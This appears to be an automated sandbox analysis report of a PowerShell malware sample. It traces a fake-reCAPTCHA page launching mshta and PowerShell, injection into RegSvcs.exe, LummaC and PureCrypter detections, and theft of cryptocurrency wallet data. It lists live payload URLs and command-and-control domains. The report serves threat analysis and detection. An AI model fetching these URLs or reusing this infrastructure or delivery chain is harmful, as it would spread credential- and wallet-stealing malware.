                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
                  Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tibnejdfjmmkpcnlpebklmnkoeoihofecuTronLinkvnkbihfbeogaeaoehlefnkodbefgpgknnwMetaMaskxfhbohimaelbohpjbbldcngcnapndodjpyBinance Chain Walletzffnbelfdoeiohenkjibnmadjiehjhajb{Yoroi|cjelfplplebdjjenllpjcblmjkfcffne}Jaxx Liberty~fihkakfobkmkjojpchpfgcmhfjnmnfpi
                  Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002CF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $eq4C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002CF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $eq1C:\Users\user\AppData\Roaming\Ethereum\keystore
                  Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus Web3
                  Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                  Source: powershell.exe, 00000000.00000002.2063528385.00007FF8490D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
                  Source: Yara matchFile source: 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.3294615870.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7296, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts321
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  OS Credential Dumping1
                  File and Directory Discovery
                  Remote Services1
                  Archive Collected Data
                  1
                  Ingress Tool Transfer
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Command and Scripting Interpreter
                  1
                  Registry Run Keys / Startup Folder
                  212
                  Process Injection
                  21
                  Deobfuscate/Decode Files or Information
                  LSASS Memory224
                  System Information Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  11
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts3
                  PowerShell
                  Logon Script (Windows)1
                  Registry Run Keys / Startup Folder
                  3
                  Obfuscated Files or Information
                  Security Account Manager431
                  Security Software Discovery
                  SMB/Windows Admin Shares1
                  Screen Capture
                  1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  DLL Side-Loading
                  NTDS2
                  Process Discovery
                  Distributed Component Object Model1
                  Email Collection
                  2
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                  Masquerading
                  LSA Secrets341
                  Virtualization/Sandbox Evasion
                  SSH3
                  Clipboard Data
                  113
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts341
                  Virtualization/Sandbox Evasion
                  Cached Domain Credentials1
                  Application Window Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items212
                  Process Injection
                  DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1591695 Sample: 00.ps1 Startdate: 15/01/2025 Architecture: WINDOWS Score: 100 43 washyceehsu.lat 2->43 45 view-reserve.com 2->45 47 12 other IPs or domains 2->47 59 Suricata IDS alerts for network traffic 2->59 61 Found malware configuration 2->61 63 Antivirus detection for URL or domain 2->63 65 8 other signatures 2->65 9 powershell.exe 11 2->9         started        12 svchost.exe 1 1 2->12         started        signatures3 process4 dnsIp5 73 Found many strings related to Crypto-Wallets (likely being stolen) 9->73 15 mshta.exe 16 9->15         started        19 conhost.exe 9->19         started        53 127.0.0.1 unknown unknown 12->53 signatures6 process7 dnsIp8 55 view-reserve.com 92.255.57.120, 443, 49704 TELSPRU Russian Federation 15->55 57 Suspicious powershell command line found 15->57 21 powershell.exe 17 15->21         started        24 powershell.exe 14 17 15->24         started        27 powershell.exe 17 15->27         started        signatures9 process10 dnsIp11 67 Writes to foreign memory regions 21->67 69 Injects a PE file into a foreign processes 21->69 29 RegSvcs.exe 1 1 21->29         started        32 conhost.exe 21->32         started        51 92.255.57.112, 49707, 49708, 49709 TELSPRU Russian Federation 24->51 34 RegSvcs.exe 2 24->34         started        36 conhost.exe 24->36         started        71 LummaC encrypted strings found 27->71 38 RegSvcs.exe 27->38         started        41 conhost.exe 27->41         started        signatures12 process13 dnsIp14 75 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 29->75 77 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 29->77 79 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 29->79 81 Queries memory information (via WMI often done to detect virtual machines) 29->81 83 Found many strings related to Crypto-Wallets (likely being stolen) 34->83 85 Tries to harvest and steal Bitcoin Wallet information 34->85 87 Detected PureCrypter Trojan 34->87 49 steamcommunity.com 104.102.49.254, 443, 49711 AKAMAI-ASUS United States 38->49 signatures15

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  00.ps10%VirustotalBrowse
                  00.ps10%ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://view-reserve.com/recaptcha-verify.htmlLMEM0%Avira URL Cloudsafe
                  https://view-reserve.com/recaptcha-verify.htmlp-0%Avira URL Cloudsafe
                  https://view-reserve.com/recaptcha-verify.htmld0%Avira URL Cloudsafe
                  https://view-reserve.com/recaptcha-verify.htmlYehItOKPCrVOrOVMGXyZZbKtNyrVXuwla0%Avira URL Cloudsafe
                  http://92.255.57.112/1/3.png100%Avira URL Cloudmalware
                  https://view-reserve.com/recaptcha-verify.htmlL0%Avira URL Cloudsafe
                  http://92.255.57.112/1/3.png$TC=$TC.replace(0%Avira URL Cloudsafe
                  https://view-reserve.com/recaptcha-verify.htmly0%Avira URL Cloudsafe
                  https://view-reserve.com/recaptcha-verify.htmlK0%Avira URL Cloudsafe
                  curtainykeo.lat100%Avira URL Cloudmalware
                  https://view-reserve.com/recaptcha-verify.htmlB0%Avira URL Cloudsafe
                  http://92.255.57.112/1/2.pngX0%Avira URL Cloudsafe
                  https://view-reserve.com/recaptcha-verify.htmlU0%Avira URL Cloudsafe
                  https://view-reserve.com/recaptcha-verify.htmlX0%Avira URL Cloudsafe
                  https://view-reserve.com/recaptcha-verify.htmlINetCookies0%Avira URL Cloudsafe
                  https://view-reserve.com/recaptcha-verify.htmlH0%Avira URL Cloudsafe
                  https://view-reserve.com/recaptcha-verify.htmleS0%Avira URL Cloudsafe
                  http://92.255.57.1120%Avira URL Cloudsafe
                  https://view-reserve.com/recaptcha-verify.html80%Avira URL Cloudsafe
                  http://92.255.57.112/1/2.png100%Avira URL Cloudmalware
                  http://92.255.H20%Avira URL Cloudsafe
                  https://view-reserve.com/recaptcha-verify.htmldJ0%Avira URL Cloudsafe
                  http://92.255.H0%Avira URL Cloudsafe
                  https://view-reserve.com/recaptcha-verify.htmlC:0%Avira URL Cloudsafe
                  https://view-reserve.com/recaptcha-verify.html...100%Avira URL Cloudmalware
                  https://view-reserve.com/0%Avira URL Cloudsafe
                  http://92.255.57.112/1/1.pngX0%Avira URL Cloudsafe
                  http://92.255.57.112/1/3.pngX0%Avira URL Cloudsafe
                  https://view-reserve.com/recaptcha-verify.htmlhttps://view-reserve.com/recaptcha-verify.html0%Avira URL Cloudsafe
                  https://view-reserve.com/recaptcha-verify.html100%Avira URL Cloudmalware
                  http://92.255.Hr0%Avira URL Cloudsafe
                  http://92.255.57.112/1/1.png100%Avira URL Cloudmalware
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  bg.microsoft.map.fastly.net
                  199.232.210.172
                  truefalse
                    high
                    steamcommunity.com
                    104.102.49.254
                    truefalse
                      high
                      view-reserve.com
                      92.255.57.120
                      truetrue
                        unknown
                        washyceehsu.lat
                        unknown
                        unknowntrue
                          unknown
                          kickykiduz.lat
                          unknown
                          unknowntrue
                            unknown
                            bloodyswif.lat
                            unknown
                            unknowntrue
                              unknown
                              savorraiykj.lat
                              unknown
                              unknowntrue
                                unknown
                                miniatureyu.lat
                                unknown
                                unknowntrue
                                  unknown
                                  curtainykeo.lat
                                  unknown
                                  unknowntrue
                                    unknown
                                    198.187.3.20.in-addr.arpa
                                    unknown
                                    unknownfalse
                                      high
                                      finickypwk.lat
                                      unknown
                                      unknowntrue
                                        unknown
                                        56.163.245.4.in-addr.arpa
                                        unknown
                                        unknownfalse
                                          high
                                          shoefeatthe.lat
                                          unknown
                                          unknowntrue
                                            unknown
                                            leggelatez.lat
                                            unknown
                                            unknowntrue
                                              unknown
                                              NameMaliciousAntivirus DetectionReputation
                                              http://92.255.57.112/1/3.pngtrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              bloodyswif.latfalse
                                                high
                                                curtainykeo.lattrue
                                                • Avira URL Cloud: malware
                                                unknown
                                                leggelatez.latfalse
                                                  high
                                                  https://steamcommunity.com/profiles/76561199724331900false
                                                    high
                                                    kickykiduz.latfalse
                                                      high
                                                      miniatureyu.latfalse
                                                        high
                                                        finickypwk.latfalse
                                                          high
                                                          shoefeatthe.latfalse
                                                            high
                                                            http://92.255.57.112/1/2.pngtrue
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            washyceehsu.latfalse
                                                              high
                                                              savorraiykj.latfalse
                                                                high
                                                                https://view-reserve.com/recaptcha-verify.htmltrue
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                http://92.255.57.112/1/1.pngtrue
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                https://player.vimeo.comRegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://view-reserve.com/recaptcha-verify.htmlLMEMmshta.exe, 00000003.00000003.2105666148.0000020E2D449000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2101288585.0000020E2D449000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2106417373.0000020E2D449000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2088287641.0000020E2D449000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2154237508.0000020E2D449000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000004.00000003.2078790926.000001A4C4DE0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drfalse
                                                                    high
                                                                    https://www.gstatic.cn/recaptcha/RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.youtube.comRegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.google.comRegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=ugSpRegSvcs.exe, 0000000D.00000002.2151633719.0000000001151000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://view-reserve.com/recaptcha-verify.htmldmshta.exe, 00000003.00000003.2085261392.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2137137562.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080596666.000002062AA44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exeRegSvcs.exe, 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.2280800865.0000024B90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2129677364.0000024B8191F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2333849561.0000022D90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D81923000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2321823186.000001D090073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D081921000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6RegSvcs.exe, 0000000D.00000002.2151633719.0000000001151000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://view-reserve.com/recaptcha-verify.htmlymshta.exe, 00000003.00000002.2136717878.000002062A9E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=englRegSvcs.exe, 0000000D.00000002.2153761108.00000000011B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://s.ytimg.com;RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2060609253.000002793F61B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2129677364.0000024B80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D080001000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2125339652.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3294615870.0000000002FDD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1RegSvcs.exe, 0000000D.00000002.2151633719.0000000001151000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&RegSvcs.exe, 0000000D.00000002.2153761108.00000000011B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://community.fastly.steamstatic.com/RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://steam.tv/RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://view-reserve.com/recaptcha-verify.htmlYehItOKPCrVOrOVMGXyZZbKtNyrVXuwlamshta.exe, 00000003.00000003.2105602304.0000020E2CE9D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://view-reserve.com/recaptcha-verify.htmlLmshta.exe, 00000003.00000002.2136717878.000002062A9E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://view-reserve.com/recaptcha-verify.htmlKmshta.exe, 00000003.00000002.2136717878.000002062A9E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://92.255.57.112/1/3.png$TC=$TC.replace(mshta.exe, 00000003.00000003.2097676404.0000020E2CE95000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2105797208.0000020E2CE99000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2105602304.0000020E2CE96000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2105700897.0000020E2CE97000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://stackoverflow.com/q/14436606/23354RegSvcs.exe, 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://view-reserve.com/recaptcha-verify.htmlp-mshta.exe, 00000003.00000003.2096936838.0000020E2CCD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080802003.0000020E2CCD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2106321743.0000020E2CCD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2152346497.0000020E2CCD0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.2132331427.000001D0818C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.2132331427.000001D0818C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://go.micropowershell.exe, 00000005.00000002.2129677364.0000024B80EA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D80EB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D080EB5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://view-reserve.com/recaptcha-verify.htmlBmshta.exe, 00000003.00000002.2136717878.000002062A9E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          http://store.steampowered.com/privacy_agreement/RegSvcs.exe, 0000000D.00000002.2151633719.0000000001151000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://view-reserve.com/recaptcha-verify.htmlHmshta.exe, 00000003.00000002.2139043663.000002062AB50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
